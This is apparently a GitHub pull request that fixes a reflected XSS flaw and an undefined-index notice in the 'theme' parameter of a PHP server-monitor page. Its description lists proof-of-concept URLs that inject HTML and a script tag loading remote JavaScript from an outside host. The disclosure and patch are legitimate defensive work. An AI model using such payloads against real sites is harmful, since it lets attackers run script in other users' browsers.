### PR TITLE
Fixed an XSS vulnerability and 'Undefined index' error for 'theme' GET parameter

### DIFF
--- a/php/swmp.php
+++ b/php/swmp.php
@@ -75,5 +75,8 @@ $wtitle = str_replace("{kernel}", $kernel, $wtitle);
 // Allow the user to specify the theme in the address
 
 if (isset($_GET['theme'])) {
-    $config['theme'] = $_GET['theme'];
+    $theme = basename($_GET['theme']);
+    
+    if(file_exists("css/themes/{$theme}.css"))
+        $config['theme'] = $theme;
 }

--- a/php/swmp.php
+++ b/php/swmp.php
@@ -50,7 +50,6 @@ $cpudata = getCpuLoadData($all_errors);
 
 $ramdata = getRamInfo($all_errors);
 
-
 $swap = getSwapData($all_errors);
 $network = getNetworkData($all_errors);
 $disk = getDiskData($all_errors);
@@ -75,6 +74,6 @@ $wtitle = str_replace("{kernel}", $kernel, $wtitle);
 
 // Allow the user to specify the theme in the address
 
-if ($_GET['theme']) {
+if (isset($_GET['theme'])) {
     $config['theme'] = $_GET['theme'];
 }


### PR DESCRIPTION
I was encountering a minor PHP Error when not provided a `theme` parameter in the URL:

`Notice: Undefined index: theme in /php/swmp.php on line 77`

I'm using Nginx and PHP7.0-fpm on a debian machine, this quick fix resolves the problem for me.

After digging a little further, I discovered that the `theme` GET parameter was directly used in the HTML output, which results in an [XSS vulnerability](https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29) when you feed HTML tags into the `theme` param, quick example:

![Screenshot example](https://cloud.githubusercontent.com/assets/821228/26460167/1dccbfc6-4179-11e7-9fe8-21beab81dfab.png)

Here are some URLs you can try out yourself:

  * `http://[your_url]/?theme=test`
    This results in no CSS theme being applied to the page because there is no CSS file called `test.css`
  * `http://[your_url]/?theme=%22%3E%3Ch1%3EHELLO%20This%20is%20pretty%20dangerous%3C/h1%3E`
    This allows injecting a big H1 message above all page content (demonstrated in screenshot above)
  * `http://[your_url]/?theme=%22%3E%3Cscript%20src=%22http://xss.rocks/xss.js%22%3E%3C/script%3E`
    Injecting remove Javascript files into the page (suprisingly, Chrome blocks this with their "XSS Auditor")

I fixed this vulnerability by first checking if the CSS file actually exists in the `css/themes` folder. If the file doesn't exist, we stick to the default `$config['theme']`.
